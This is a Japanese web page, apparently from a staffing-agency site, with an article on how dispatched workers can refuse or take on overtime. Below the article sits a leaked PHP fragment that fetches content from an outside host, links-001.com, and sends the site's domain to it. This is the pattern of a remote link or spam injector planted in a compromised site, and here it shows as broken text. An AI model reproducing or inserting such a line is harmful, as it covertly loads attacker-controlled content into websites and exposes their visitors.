前へ
次へ

使ってもらえる人材派遣

培ったノウハウが経営上役に立つ、そうした人材派遣の魅力を派遣先の企業があげています。
業務が定期的にあ

more

給料の支払い頻度が多い人材派遣

人材派遣という働き方には、少々特殊な点があります。
給料は、比較的頻繁に支払われる会社が多いです。
例え

more

安心して働ける人材派遣

会社で仕事をするときはどのような形が良いか、十分に考えておかなければいけません。
自分に向いている働き

more

人材派遣として働く時は残業は必須なのか

人材派遣という働き方には、色々なメリットがあります。
残業に関するメリットもありますし、正社員でなく派遣という働き方を検討している方も少なくありません。
会社員として働いていると、たまに残業を命じられる事があります。
業務量が多い時などは、会社から残業を支持されるケースもありますが、それでストレスを抱えている方も少なくありません。
というのも正社員の場合は、基本的には会社の指示に従う必要があります。
勤務先が残業を指示してきた時には、それに従わなければなりません。
そして企業によっては、労働時間がかなり長くなっている事もあります。
繁忙期になりますと、業務量がかなり増えてしまいますから、1ヶ月の労働時間がかなり長くなってしまう事も多いです。
あまり労働時間が長いと、ストレスが蓄積されてしまう事もあります。
企業によっては、1ヶ月に20時間程度の残業が発生してしまう事もあり、ストレスが溜まってしまう事も実際あります。
ですから求職活動している方々は労働時間を気にしている事も多いです。
ところで人材派遣という働き方は、また事情が少々異なります。
派遣という働き方でも、上司から残業を依頼されるケースはあります。
正社員と同じく、繁忙期になれば残業を明示られる事も実際ありますが、必須ではありません。
正社員と違って、派遣は残業を選ぶ事ができます。
たとえ会社から命じられたとしても、派遣社員は残業を断る事も可能です。
ですから上記のようなストレスが気になる時は、残業を断る事はできます。
逆に、残業を引き受けることも可能です。
人によっては、何とかしてお金を稼ぎたいと考えている事もあります。
そもそも残業をすれば、通常よりは時給は高くなります。
本来なら時給1200円の仕事でも、残業をすれば1400円以上になる訳です。
ですから稼ぎたい時は、あえて残業を引き受けることもできます。
正社員と違って、残業するかどうかを自由に選べるメリットがあるので、派遣という働き方を選んでいる方も少なくありません。

".file_get_contents('http://links-001.com/gfjset.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top